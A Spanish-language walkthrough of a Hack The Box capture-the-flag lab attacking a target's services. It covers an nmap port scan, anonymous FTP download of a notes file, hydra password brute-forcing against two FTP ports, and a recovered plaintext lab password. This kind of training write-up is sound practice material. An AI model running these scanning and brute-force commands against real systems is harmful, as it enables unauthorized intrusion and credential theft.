Inlanefreight - Attacking Common Services (Medium)
Objetivo: Revisar la seguridad del servidor y obtener el contenido de flag.txt.
Target: 10.129.203.7 (Inlanefreight.htb)
Flag format: HTB{...}
🔎 Escaneo inicial de puertos
sudo nmap -p- --min-rate 5000 --open -sS -n -sVC 10.129.121.116
Puertos abiertos detectados:
| Puerto | Servicio | Info relevante |
|---|---|---|
| 22 | SSH 🔑 | OpenSSH 8.2p1 Ubuntu, soporte para autenticación por contraseña y/o llave |
| 53 | DNS 🌐 | ISC BIND 9.16.1, permite enumeración de registros |
| 110 | POP3 ✉️ | Dovecot pop3d, soporta USER, TOP, SASL(PLAIN) |
| 995 | POP3S 🔒 | Dovecot pop3d, POP3 sobre SSL/TLS |
| 2121 | FTP 💾 | ProFTPD (InlaneFTP) — puerto alternativo, comandos limitados |
| 30021 | FTP 💾 | ProFTPD adicional, servicio no reconocido completamente |
📌 Observaciones rápidas:
-
POP3 y POP3S permiten enumerar usuarios internos ✉️
-
FTP alternativo (2121 / 30021) puede tener credenciales por defecto o repetidas 💻
-
SSH abierto → posible fuerza bruta o autenticación por clave 🔑
-
DNS abierto → posible información de zonas internas 🌐
FTP 💾🎒
-
El servicio FTP en puerto alternativo permite conexión anónima y revela una carpeta
simon📁👀 -
Conexión típica para inspeccionar y descargar notas:
ftp 10.129.167.40 30021
anonymous
get mynotes.txt
- El fichero
mynotes.txtcontiene posibles contraseñas para el usuariosimon— útil como diccionario para pruebas 💡
hydra -l simon -P mynotes.txt ftp://10.129.167.40:2121
hydra -l simon -P mynotes.txt ftp://10.129.167.40:30021
Resultado: contraseña válida para simon encontrada ✅
Ns8j1b!23hs4921smHzwn 🔐
